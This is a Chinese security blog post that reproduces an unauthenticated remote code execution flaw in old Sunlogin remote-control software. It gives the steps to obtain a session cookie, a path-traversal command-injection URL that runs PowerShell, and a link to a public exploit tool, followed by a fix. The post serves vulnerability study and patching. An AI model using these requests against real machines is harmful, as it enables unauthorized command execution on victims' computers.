freeBuf
主站

分类

云安全 AI安全 开发安全 终端安全 数据安全 Web安全 基础安全 企业安全 关基安全 移动安全 系统安全 其他安全

特色

热点 工具 漏洞 人物志 活动 安全招聘 攻防演练 政策法规

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

向日葵远程代码执行漏洞(CNVD-2022-10270CNVD-2022-03672)
2022-03-21 16:17:21
所属地 北京

1.漏洞原理:

向日葵本是一款远程控制工具,可远程控制电脑手机等。漏洞成因主要是低版本下存在未授权访问漏洞,当你打开先日葵(旧版)后,未授权的端口自然也被打开,然而攻击者可以通过此端口不需要密码获取session,借助session远程执行任意命令,进而获取服务器权限。

2.影响版本:

向日葵个人版 windows 11.0.0.33以下(包含0.33)

向日葵简约版 windows V1.0.1.43315 (2021.12)

3.漏洞复现:

3.1.手工复现

3.1.1.打开向日葵,cmd执行tasklist查看进程信息,发现三个进程号与向日葵有关
image
3.1.2.cmd执行 netstat -ano | findstr PID 对进程逐一排查
image
3.1.3.端口扫描器对本机IP进行扫描
image
3.1.4.发现端口开放在0.0.0.0上
image
3.1.5.访问http://本机ip:1138
image
3.1.6.获取cookie,url后面加上 /cgi-bin/rpc?action=verify-haras

访问http://本机ip:1138/cgi-bin/rpc?action=verify-haras
image
3.1.7.构造payload,漏洞发生在接口/check处,当参数cmd的值以ping或者nslookup开头时可以构造命令实现远程命令执行

http://本机ip:1138/check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+%20whoami

http://本机ip:1138/check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+%20whoami

3.1.8.用burpsuite工具进行抓包,请求包中添加获取的cookie
image
image
3.1.9.进而获取到命令执行的结果

image-20220321150902428

3.2.工具复现

3.2.1.工具下载地址:https://github.com/Mr-xn/sunlogin_rce 内置旧版本向日葵(漏洞版)
image

工具说明:

-h 指定目标

-t 选择扫描或者命令执行 默认scan

-p 设置扫描端口范围 默认4w到65535

-c 需要执行的命令

image

4.修复方案

向日葵官网下载最新版本

本文内容及使用工具仅限学习交流,用户滥用造成的一切后果均与作者无关,作者不承担任何直接责任, 后果均由用户本人负责,使用者请务必遵守当地法律法规。

# 渗透测试 # web安全
本文为 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者
文章目录